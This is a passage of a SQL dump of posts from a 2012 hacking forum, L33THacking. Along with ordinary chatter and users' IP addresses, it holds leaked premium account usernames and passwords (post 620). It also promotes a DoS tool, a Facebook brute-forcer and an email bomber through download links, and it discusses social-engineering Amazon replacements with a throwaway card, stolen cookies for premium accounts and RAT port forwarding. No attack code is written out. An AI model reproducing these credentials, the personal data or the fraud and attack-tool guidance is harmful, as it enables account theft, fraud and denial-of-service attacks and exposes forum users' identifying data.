will be up by tomorrow. You would be able to request new groups there. I will be making free groups for a long term.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '475a75205e559b05140b8bf85f4a69d4', '0', '0'); INSERT INTO mybb_posts VALUES('609', '165', '492', '5', 'RE: Just did something', '0', '1', 't3h jok3r', '1345597603', 'That\'s great. Thanks for helping LH out with advertising, I highly appreciate it.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '1b74dbb136da39d34ebd368f2730bbb3', '0', '0'); INSERT INTO mybb_posts VALUES('610', '43', '519', '7', 'RE: How did you find us?', '0', '87', 'Hostpro', '1345631532', '[quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\']\r\nI came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =]\r\n[/quote]\r\n\r\nYou came here from the profiters lol*', '94.11.244.95', '1577841759', '0', '0', '0', '0', '1', '2ba7527247c8e830e9a3c77e2fdf35a4', '0', '0'); INSERT INTO mybb_posts VALUES('611', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '62', 'R?????zo?', '1345634135', 'I tried brazzers one and didn\'t work out for me, thanks for sharing though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cba30072306b1d983e922c6d4375ae92', '0', '0'); INSERT INTO mybb_posts VALUES('612', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '62', 'R?????zo?', '1345634196', 'Thanks for this, I will try today.\n\nEDIT: File got removed, please fix the link :)', '94.132.244.168', '1585771688', '1', '0', '62', '1345634238', '1', 'cac0cae3f8ed57a1601f57b2b560f347', '0', '1345634238'); INSERT INTO mybb_posts VALUES('613', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1345641367', 'Link updated and yes it is kind of a bruteforcer.', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'c2a6d0e9c7133160dd133fd1ae0b2458', '0', '0'); INSERT INTO mybb_posts VALUES('614', '175', '600', '42', 'RE: Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345641476', '[quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\']\r\nI\'m an Apple fan :p\r\nIf you see in my name, it says \"Ipod\" =]\r\n[/quote]\r\n\r\nHonestly, I also like Apple products. What kind of Ipod do you have?', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'dae69103f08be24e004327b581dc6abe', '0', '0'); INSERT INTO mybb_posts VALUES('615', '59', '599', '42', 'RE: 13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1345641562', '[quote=\'iTzIpod\' pid=\'599\' dateline=\'1345595833\']\r\n[quote=\'t3h jok3r\' pid=\'577\' dateline=\'1345590490\']\r\n[quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\']\r\n[quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\']\r\n[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\']\r\nOMG I remember that show. It was like the best :p\r\nOT: It is a program. And it is a good thing he stopped.\r\n[/quote]\r\n\r\nWhat program are you talking about?\r\n[/quote]\r\n\r\nBeyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in.\r\nI don\'t know how to explain it. But if you watch the show, then you would notice it.\r\n[/quote]\r\n\r\n:roflol:\r\n\r\nMy bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program.\r\n[/quote]\r\n\r\nLOL! Sorry I guess I wasn\'t specific enough :/\r\n:thinking:\r\n[/quote]\r\n\r\nIt\'s OK lol I should have thought about it twice.', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'ef35f94ecba2651cdfbc1ef52351437b', '0', '0'); INSERT INTO mybb_posts VALUES('616', '43', '610', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345644904', '[quote=\'Hostpro\' pid=\'610\' dateline=\'1345631532\']\r\n[quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\']\r\nI came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =]\r\n[/quote]\r\n\r\nYou came here from the profiters lol*\r\n[/quote]\r\n\r\nYou can\'t keep secrets? :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bed72ab1749461633489aaffe32cb17e', '0', '0'); INSERT INTO mybb_posts VALUES('617', '175', '614', '42', 'RE: Is Apple really the most valuable company?', '0', '82', 'iTzIpod', '1345645081', '[quote=\'t3h jok3r\' pid=\'614\' dateline=\'1345641476\']\r\n[quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\']\r\nI\'m an Apple fan :p\r\nIf you see in my name, it says \"Ipod\" =]\r\n[/quote]\r\n\r\nHonestly, I also like Apple products. What kind of Ipod do you have?\r\n[/quote]\r\n\r\nI got an iPod Touch 4th Generation 32GB.\r\nI really want the iPod Touch 5th Generation when it comes out though!\r\nLook at the features. http://www.apple.com/ios/features.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '876c7e92a47be5b44c6de456bc16dfdf', '0', '0'); INSERT INTO mybb_posts VALUES('618', '164', '607', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345645289', '[quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\']\r\nThanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads.\r\n[/quote]\r\n\r\nI noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then.\r\n\r\nNice feature. It will be useful! =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa8e43ca6b410f3d65967e37d7c5814d', '0', '0'); INSERT INTO mybb_posts VALUES('619', '182', '0', '49', 'Upgraded Forum', '0', '82', 'iTzIpod', '1345647134', 'Hey LH.\nI want there to be a Sub Forum in the Upgraded Section. And that would be the Elite Request Sub Forum. So basically in that forum, you get to request any account, eBook, program,serial keys etc. And the account can be an account for anything. But if it is for a game, don\'t expect someone to give you a Runescape account with 500 Million Gold or whatever. Just accounts as in Netflix, Rapidshare, DollarFiles, FileIce, etc. All Accounts must be [b]PREMIUM[/b]. And you can also request other things such as programs that are cracked and tested + virus scan included. Programs like Youtube Account Creators, Hotmail Account Creators, etc. Serial Keys for programs like Adobe Photoshop CS6, Microsoft Office Set, etc. eBooks on how to make money, how to SE, etc.', '24.212.197.164', '416597412', '1', '0', '82', '1345647221', '1', '98e9773b0204ae13394a7f4c724e4e93', '0', '1345647221'); INSERT INTO mybb_posts VALUES('620', '183', '0', '54', '2x PlayBoy Premium', '0', '54', 'Sin Cara', '1345647979', '[code]helper23 - 86MILLIE\r\nbz350z - 5uperman [/code]\r\n\r\nEnjoy;)', '119.154.28.197', '2006588613', '1', '0', '0', '0', '1', 'bc3b1a9174cce5ae1612c8d35e817e8e', '0', '0'); INSERT INTO mybb_posts VALUES('621', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345648605', 'Check your pm. I sent you the mediafirelink.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '381b4580bfeeaf83cd62f5af20d08942', '0', '0'); INSERT INTO mybb_posts VALUES('622', '184', '0', '35', '[Video] I\'m a video editor!', '8', '61', 'NXK', '1345652411', 'So if you\'re a gamer, and you got a beast clip? Let me know!\r\n Iv been editing for a while now and id say i\'m finally starting to get good.\r\n\r\nExample of my work\r\n[video=youtube]http://www.youtube.com/watch?v=A6PkGu5fmwo[/video]\r\n\r\nIf you have anything you\'d like edited let me know.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '66b2fe09837ff33a1ac112e62ca34896', '0', '0'); INSERT INTO mybb_posts VALUES('623', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345654461', 'Ok I received it. Thanks!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e7ab84ba68a6e8a76502e839061d4df', '0', '0'); INSERT INTO mybb_posts VALUES('624', '164', '618', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345665814', '[quote=\'iTzIpod\' pid=\'618\' dateline=\'1345645289\']\r\n[quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\']\r\nThanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads.\r\n[/quote]\r\n\r\nI noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then.\r\n\r\nNice feature. It will be useful! =]\r\n[/quote]\r\n\r\nHonestly, this feature existed since the start but because we switched to a new theme, the feature couldn\'t be written on the new theme. I believe all our features are working properly now.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', 'c91e5522dd9a16f30434bbfd1f3b7a9c', '0', '0'); INSERT INTO mybb_posts VALUES('625', '43', '616', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345666614', '[quote=\'iTzIpod\' pid=\'616\' dateline=\'1345644904\']\r\n[quote=\'Hostpro\' pid=\'610\' dateline=\'1345631532\']\r\n[quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\']\r\nI came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =]\r\n[/quote]\r\n\r\nYou came here from the profiters lol*\r\n[/quote]\r\n\r\nYou can\'t keep secrets? :P\r\n[/quote]\r\n\r\nLol I knew you joined from Profiters but I got confused when you took my username.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', 'd7ea7121dbf76d4761b188e8d3d4fe6a', '0', '0'); INSERT INTO mybb_posts VALUES('626', '175', '617', '42', 'RE: Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345666663', '[quote=\'iTzIpod\' pid=\'617\' dateline=\'1345645081\']\r\n[quote=\'t3h jok3r\' pid=\'614\' dateline=\'1345641476\']\r\n[quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\']\r\nI\'m an Apple fan :p\r\nIf you see in my name, it says \"Ipod\" =]\r\n[/quote]\r\n\r\nHonestly, I also like Apple products. What kind of Ipod do you have?\r\n[/quote]\r\n\r\nI got an iPod Touch 4th Generation 32GB.\r\nI really want the iPod Touch 5th Generation when it comes out though!\r\nLook at the features. http://www.apple.com/ios/features.html\r\n[/quote]\r\n\r\nI have the same Ipod generation and space.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', '4189a923940408db12e99649088624d9', '0', '0'); INSERT INTO mybb_posts VALUES('627', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345668585', 'What? What do you mean took my username? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca1735406e9403c114f7407efa46aef0', '0', '0'); INSERT INTO mybb_posts VALUES('628', '164', '624', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345668699', '[quote=\'t3h jok3r\' pid=\'624\' dateline=\'1345665814\']\r\n[quote=\'iTzIpod\' pid=\'618\' dateline=\'1345645289\']\r\n[quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\']\r\nThanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads.\r\n[/quote]\r\n\r\nI noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then.\r\n\r\nNice feature. It will be useful! =]\r\n[/quote]\r\n\r\nHonestly, this feature existed since the start but because we switched to a new theme, the feature couldn\'t be written on the new theme. I believe all our features are working properly now.\r\n[/quote]\r\n\r\nDon\'t worry. I\'ll report any bugs I encounter. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '385c6d359689c1bebb52399d87dbf9cd', '0', '0'); INSERT INTO mybb_posts VALUES('629', '185', '0', '4', 'Hey', '0', '90', 'duhuh', '1345670869', 'so this is me saying hi, i came from Happy Forums, looking forward to see the SEO section:)', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '502832833f47fcf4c1be660e3873d66b', '0', '0'); INSERT INTO mybb_posts VALUES('630', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '90', 'duhuh', '1345670941', 'wow thats sick thanks for the share!', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '17367710eb000a274368f44a91ca53e7', '0', '0'); INSERT INTO mybb_posts VALUES('631', '139', '564', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '90', 'duhuh', '1345671143', '[quote=\'Sin Cara\' pid=\'564\' dateline=\'1345559956\']\r\n[quote=\'iTzIpod\' pid=\'536\' dateline=\'1345556489\']\r\nWhen I try to go on \r\nhttp://skype.hotspotshield.com/banner.php\r\nI get this message saying Temporarily Unavailable! :/\r\n[/quote]\r\n\r\nDon\'t worry..... Just wait ;)\r\n[/quote]\r\n\r\nHey so how long should we wait, and refresh for?', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'd1ab1b412bfad65e973a1057208e51e8', '0', '0'); INSERT INTO mybb_posts VALUES('632', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '90', 'duhuh', '1345671202', 'Does this work still, i only ask as it has megaupload in the list and so may not be working still?\n\nEdit,\n\nalso i then tried it,\n\nhttp://gyazo.com/658f6672eb5507d013987eb788794d11\n\nand when i hit enter i get a error,', '86.182.139.218', '1454803930', '0', '0', '90', '1345671308', '1', 'f29c2c0da207842b58be624981e47e7a', '0', '1345671308'); INSERT INTO mybb_posts VALUES('633', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '90', 'duhuh', '1345671429', 'Can this be removed? will anyone here actually do a survey? Sorry but I really don\'t think you should post Survey links here, its just gay as fuck.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c39b39aee4ede7bac6f457172356bebb', '0', '0'); INSERT INTO mybb_posts VALUES('634', '182', '619', '49', 'RE: Upgraded Forum', '0', '20', 'JakeUS', '1345672633', 'I like this idea, hope it is added.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '971a15b946ae18ce0cf8e4a0301af4de', '0', '0'); INSERT INTO mybb_posts VALUES('635', '185', '629', '4', 'RE: Hey', '0', '20', 'JakeUS', '1345673077', 'Welcome to the site.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '46f8bb2d27005f69997fd485ec682939', '0', '0'); INSERT INTO mybb_posts VALUES('636', '185', '629', '4', 'RE: Hey', '0', '61', 'NXK', '1345674110', 'Welcome, I hope you enjoy it here.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3839b8218d5d50736ff0037b40bf6f9d', '0', '0'); INSERT INTO mybb_posts VALUES('637', '182', '619', '49', 'RE: Upgraded Forum', '0', '1', 't3h jok3r', '1345675832', 'I was actually on this thread about an hour or two ago and was going to add a forum, but I had to code some stuff first which were pending for over a week. I will add the section by today. \n\nThanks for the suggestion.', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', 'c3988ddcf00aa456bd0695013d4a0767', '0', '0'); INSERT INTO mybb_posts VALUES('638', '186', '0', '16', 'SE razor?', '0', '90', 'duhuh', '1345678480', 'Anyone know a guide to do this at all?\r\n\r\nsome people say it is really simple?\r\n\r\nanyone know?\r\n\r\nthanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'e1e8d14de7e15329f14075729dcac53d', '0', '0'); INSERT INTO mybb_posts VALUES('639', '185', '629', '4', 'RE: Hey', '0', '1', 't3h jok3r', '1345678521', 'Welcome to L33THacking, Feel free to contact any staff member if you have any problems or questions.', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', '1dfab606ca789f09e7e35f612527c628', '0', '0'); INSERT INTO mybb_posts VALUES('640', '187', '0', '3', 'Public Downloads?', '0', '1', 't3h jok3r', '1345678843', 'I was wondering if I should make a rule where all the downloads links are public, no post here and PM mes\' for all the forums that distribute programs and tools?\r\n\r\nThe chances would increase for leeching and links would die out soon but what does the forum think?', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', '81e8d32667bf9502ba2c793cb04176c3', '0', '0'); INSERT INTO mybb_posts VALUES('641', '188', '0', '59', 'MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '2', '90', 'duhuh', '1345679003', 'I do not claim to own any of these, i got them from a guy on HF who made me do a survey for them ...\r\n\r\nbut just a direct link for you guys,\r\n\r\nhttps://www.dropbox.com/sh/i9g0p95v35qj3bu/WLy-dg5EeQ\r\n\r\npictures.\r\n\r\nhttp://gyazo.com/809fd504a72a70acd8de37cf42de4600\r\nhttp://gyazo.com/0815e30855e1234dd25e084e7aab9f01\r\nhttp://gyazo.com/a9308c7b830e8f37998f75e7b2ebe072\r\nhttp://gyazo.com/b6014a9992456278d52f29a36f9c63d0\r\n\r\n\r\nas you can see theres a fuck ton.\r\n\r\nhave fun,\r\n\r\nI say limited as i believe dropbox will only do a certain amount of downloads,\r\n\r\nwhen the time comes ill try and upload it to mediafire.', '86.182.139.218', '1454803930', '0', '0', '90', '1345738000', '1', 'cb3deef8d8c0730858b7e546a841cc4e', '0', '1345738000'); INSERT INTO mybb_posts VALUES('642', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '1', 't3h jok3r', '1345679286', 'God damn, that\'s hell of a ebooks. Thanks for the massive contribution.\r\n\r\nYou don\'t have an Ebook that I have, want to know which one?\r\n\r\n[spoiler]\r\nA masturbation Ebook ;)\r\n[/spoiler]', '41.174.8.53', '699271221', '1', '0', '0', '0', '1', 'f97d15d07609dabcafe9ce2a298e1e06', '0', '0'); INSERT INTO mybb_posts VALUES('643', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '7', 'Romdu62', '1345681046', 'Viewing from my phone but according to what I see those are a lot of ebooks.', '41.174.8.53', '699271221', '0', '0', '0', '0', '1', '39e8890e0ee9871e28ef6ca022250312', '0', '0'); INSERT INTO mybb_posts VALUES('644', '57', '431', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '7', 'Romdu62', '1345681211', '[quote=\'sirchamp\' pid=\'431\' dateline=\'1345392491\']\nReupload please. Thank you\n[/quote]\nThe problem is that LH bots keep on spamming the link with views so it keeps on getting removed. So updating it would be useless I guess, but lets hope the OP does :D', '41.174.8.53', '699271221', '0', '0', '1', '1345681282', '1', 'f20f68469a450a09f83a5c0208b6e4f8', '0', '1345681282'); INSERT INTO mybb_posts VALUES('645', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '100', '??zg???g????61', '1345684691', 'alrighty I\'m kinda scared. I just did this, they are sending a replacement but they have told me that I have to send broken one back, which I obviously cant do. What do I do????\n[hr]\nIf I don\'t in thirty days they will charge the credit care(VCC), I could care less about that, but they have my address?', '70.16.221.26', '1175510298', '1', '0', '100', '1345733623', '1', '79bc5ffa2c71f4cb49eecd184d0090db', '0', '1345733623'); INSERT INTO mybb_posts VALUES('646', '185', '629', '4', 'RE: Hey', '0', '82', 'iTzIpod', '1345689206', 'Welcome to L33t Hacking! Once a L33t, Always a L33t! Enjoy your stay!', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '79cea4b0cb1ba4d266219539a71c0baf', '0', '0'); INSERT INTO mybb_posts VALUES('647', '187', '640', '3', 'RE: Public Downloads?', '0', '62', 'R?????zo?', '1345712561', 'I think the PM system is quite good, it forces the user (even if its leeching) to bump the thread which will prevent the thread to getting old. Instead of just downloading and don\'t even say thanks and the thread will just die there (not alot of people use the search bar they just look to the new threads)', '95.69.45.190', '1598369214', '1', '0', '0', '0', '1', '68902bdad6812ce48691acb7ab20c5df', '0', '0'); INSERT INTO mybb_posts VALUES('648', '186', '638', '16', 'RE: SE razor?', '0', '62', 'R?????zo?', '1345712972', 'http://www.mediafire.com/?crgc59o9mwjzc75\n\nThere you go.\nI take no credits, it was given by someone on HF.', '95.69.45.190', '1598369214', '1', '0', '0', '0', '1', 'a2655db11f58fad0396cc05dcb52ae3b', '0', '0'); INSERT INTO mybb_posts VALUES('649', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '54', 'Sin Cara', '1345717785', 'But it works fine for me ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', '797d8afedb02d81428e32c15e7f6cd77', '0', '0'); INSERT INTO mybb_posts VALUES('650', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345720020', 'I don\'t know Bro... sorry for that ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', '356f4aa623ce9448c9d6618270dac239', '0', '0'); INSERT INTO mybb_posts VALUES('651', '150', '398', '12', 'RE: [TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '54', 'Sin Cara', '1345720070', 'Thanks for the nice feedback ;)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'dc4029a8e40c98e4d980db152c4e22b4', '0', '0'); INSERT INTO mybb_posts VALUES('652', '189', '0', '49', 'Webmaster Section', '0', '54', 'Sin Cara', '1345720201', 'I think there should be a webmaster section so members can discuss about domain, hosting and other stuff related to webmaster.', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'b0b8609ab505b09dd5da220e01b6b454', '0', '0'); INSERT INTO mybb_posts VALUES('653', '149', '584', '12', 'RE: How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345722491', '[quote=\'Triple H\' pid=\'584\' dateline=\'1345592116\']\r\nI would give this a try, would you recommend doing a backup before doing this?\r\n[/quote]\r\n\r\nYeah, it will be better to make back up before :)', '119.154.3.85', '2006582101', '1', '0', '0', '0', '1', 'c71fbb2859e175e88f0eecd9e2044ede', '0', '0'); INSERT INTO mybb_posts VALUES('654', '189', '652', '49', 'RE: Webmaster Section', '0', '82', 'iTzIpod', '1345730037', 'We need more members first. -1.', '216.172.135.132', '-659781756', '1', '0', '82', '1345758884', '1', 'a7ec4e75b458bb25b56900e47890caab', '0', '1345758884'); INSERT INTO mybb_posts VALUES('655', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '82', 'iTzIpod', '1345730342', 'Thank you. :p \nNice release <3', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '2fb4fdf1458679e79190b74f206b756c', '0', '0'); INSERT INTO mybb_posts VALUES('656', '187', '640', '3', 'RE: Public Downloads?', '0', '82', 'iTzIpod', '1345730390', 'I disagree with this suggestion.\n\nRight now, the forum needs more activity going on. So leecher or not they need to post. And that post contributes to the forum\'s total posts.', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '443951676c49443c3d4f1d429814a1a5', '0', '0'); INSERT INTO mybb_posts VALUES('657', '184', '622', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345730483', 'It\'s alright. Also, if I ever got a video I need edited, I will come to you. =]\n\n\nWhat game is this?\n\nAlso, what system? PS3, Xbox 360, PC?', '216.172.135.132', '-659781756', '1', '0', '0', '0', '1', '2134c30ece1be25f1e1a8739338b1c7b', '0', '0'); INSERT INTO mybb_posts VALUES('658', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited}', '0', '90', 'duhuh', '1345737841', 'Yep it\'s a hell of alot of books, what would be cool is if someone can do a review on one which you find particularly good, or interesting.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '1ca59511e3bbaca6ad8cfd7f93b50d95', '0', '0'); INSERT INTO mybb_posts VALUES('659', '186', '638', '16', 'RE: SE razor?', '0', '90', 'duhuh', '1345738251', 'thanks man, god why do we have a message minimum', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '1b338e5a6d054907bba44480291d7375', '0', '0'); INSERT INTO mybb_posts VALUES('660', '184', '657', '35', 'RE: [Video] I\'m a video editor!', '0', '61', 'NXK', '1345738559', '[quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\']\r\nIt\'s alright. Also, if I ever got a video I need edited, I will come to you. =]\r\n\r\n\r\nWhat game is this?\r\n\r\nAlso, what system? PS3, Xbox 360, PC?\r\n[/quote]\r\n\r\nIt\'s counter strike source for PC', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '645a0d07edb6bd864a937bc6961279d0', '0', '0'); INSERT INTO mybb_posts VALUES('661', '186', '638', '16', 'RE: SE razor?', '0', '61', 'NXK', '1345743817', 'It\'s quite easy, All you need is a friend with the item you are trying to SE.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '4d8ff79da75dfc4719714abb3e94558b', '0', '0'); INSERT INTO mybb_posts VALUES('662', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '61', 'NXK', '1345744483', 'This is nice, I have my own API like this And iv been thinking about creating one but I guess you got that under control!\nNice release.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'a32d608ac0976a7fce6073af9b880cf7', '0', '0'); INSERT INTO mybb_posts VALUES('663', '187', '640', '3', 'RE: Public Downloads?', '0', '20', 'JakeUS', '1345745346', 'Maybe a plugin where you either have to post or have 50+ posts?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'eaaff92fbe5341184f82afdb3df492e3', '0', '0'); INSERT INTO mybb_posts VALUES('664', '187', '640', '3', 'RE: Public Downloads?', '0', '53', 'sirchamp', '1345745487', 'In my opinion its fine as it is.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e1b566f87e6d17a07c6cd038d41093dc', '0', '0'); INSERT INTO mybb_posts VALUES('665', '190', '0', '56', 'Copy and paste game', '0', '61', 'NXK', '1345746025', 'What do you have copy/pasted right now? without changing it!\r\n\r\nmines this\r\nhttp://www.dell.com/us/p/alienware-x51/pd.aspx\r\n\r\nShowing my brother a small pc for his new apartment that\'s small with a good payment plan', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'db40d4aadabbf24eb7f1d8758e6ceb22', '0', '0'); INSERT INTO mybb_posts VALUES('666', '191', '0', '15', 'ProDos v1.0', '0', '53', 'sirchamp', '1345746532', 'ProDos 1.0 is twice as powerfull as Loic or Serverattack.\nIt\'s a very strong Dos Tool.\nCoded in C++ by 0v3rd0z3r aka SatansWrath\n[color=#000080]Screenshots:[/color][color=#FFFFFF]\n[img]http://i50.tinypic.com/25i5j0n.jpg[/img]\n[img]http://i46.tinypic.com/xpbj9d.jpg[/img]\n[img]http://i49.tinypic.com/2qkmpt4.jpg[/img][/color]\n\n\n[lock][color=#000080]Download link:[/color][color=#FFFFFF] http://www.mediafire.com/?44jcdf6gzfo78ui[/lock]\n\n[/color][color=#000080]Virusscan:[/color][color=#FFFFFF] http://virusscan.jotti.org/de/scanresult/f82dd4cc8e7aa93880ba9cc433690999a1658d60\n[color=#FF0000]7/20 35%[/color]\n\n[/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352012096', '1', 'de919c04b85e68ee4ff080a94e7d20f4', '0', '1352012096'); INSERT INTO mybb_posts VALUES('667', '192', '0', '49', '[Suggestion] Forum Games Section', '0', '82', 'iTzIpod', '1345749254', 'In this section, allows users to post a Forum Game thread.\r\nSuch as\r\nLast person to reply wins\r\nBan the user above you\r\nCount to 1000\r\nEtc.\r\n\r\nAnd since I just saw a Forum Game thread in the [url=http://l33thacking.com/forumdisplay.php?fid=7] Off Topic Section[/url], I don\'t want people to be spamming threads or posts just to get their posts up. I was previously on a different forum where one of the members have done so.\r\n\r\nSo anyways, this Forum Games section contains all the Forum Games threads. And if you post in these threads, you don\'t get your post count up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4de8d18d9dffd770d4436e0e4aa1665', '0', '0'); INSERT INTO mybb_posts VALUES('668', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1345749300', 'http://l33thacking.com/forumdisplay.php?fid=7 I just made a suggestion and this was the latest thing I copied and pasted.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a15a62169495d929651eee1a76e753b7', '0', '0'); INSERT INTO mybb_posts VALUES('669', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '82', 'iTzIpod', '1345749545', 'Still temporarily unavailable! :/ Been 2 days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9eda3fccdd9a057812ea5da3a53f1f3', '0', '0'); INSERT INTO mybb_posts VALUES('670', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '82', 'iTzIpod', '1345749631', 'I\'ll see whats inside. ;)\n\nNice release.\n\nEDIT: Download Link is broken.', '24.212.197.164', '416597412', '1', '0', '82', '1345749699', '1', '7965c54f4bd5ae3ec771e48095a760c1', '0', '1345749699'); INSERT INTO mybb_posts VALUES('671', '184', '660', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345749808', '[quote=\'NXK\' pid=\'660\' dateline=\'1345738559\']\r\n[quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\']\r\nIt\'s alright. Also, if I ever got a video I need edited, I will come to you. =]\r\n\r\n\r\nWhat game is this?\r\n\r\nAlso, what system? PS3, Xbox 360, PC?\r\n[/quote]\r\n\r\nIt\'s counter strike source for PC\r\n[/quote]\r\n\r\n\r\n\r\nOh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe22bb5087b07847edb4dd07f598798d', '0', '0'); INSERT INTO mybb_posts VALUES('672', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '62', 'R?????zo?', '1345749863', 'thanks for this. looks great', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b6a62506035d495f36eb903eb0b21312', '0', '0'); INSERT INTO 